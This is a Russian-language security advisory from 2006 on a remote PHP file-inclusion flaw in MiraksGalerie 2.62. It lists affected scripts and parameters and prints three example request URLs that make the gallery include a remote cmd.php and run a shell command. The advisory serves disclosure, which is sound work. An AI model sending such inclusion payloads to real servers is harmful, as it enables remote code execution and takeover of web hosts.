PHP-инклюдинг в MiraksGalerie

Дата публикации:
09.06.2006
Дата изменения:
17.10.2006
Всего просмотров:
2288
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
MiraksGalerie 2.x
Уязвимые версии: MiraksGalerie 2.62, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "g_pcltar_lib_dir" в сценарии pcltar.lib.php (требует наличие включенной опции "register_globals"), и в параметре "listconfigfile[]" в сценарии galsecurity.lib.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://example/[mg_path]/pcltar.lib.php?g_pcltar_lib_dir=http://example/cmd.php?exec=uname
http://example/[mg_path]/galimage.lib.php?listconfigfile[0]=http://example/cmd.php?exec=uname
http://example/[mg_path]/galsecurity.lib.php?listconfigfile[0]=http://example/cmd.php?exec=uname

URL производителя: www.miraks.com/index.php?url=print_outils&id=2022

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: MiraksGalerie <= 2.62 Multiple Remote command execution

или введите имя

CAPTCHA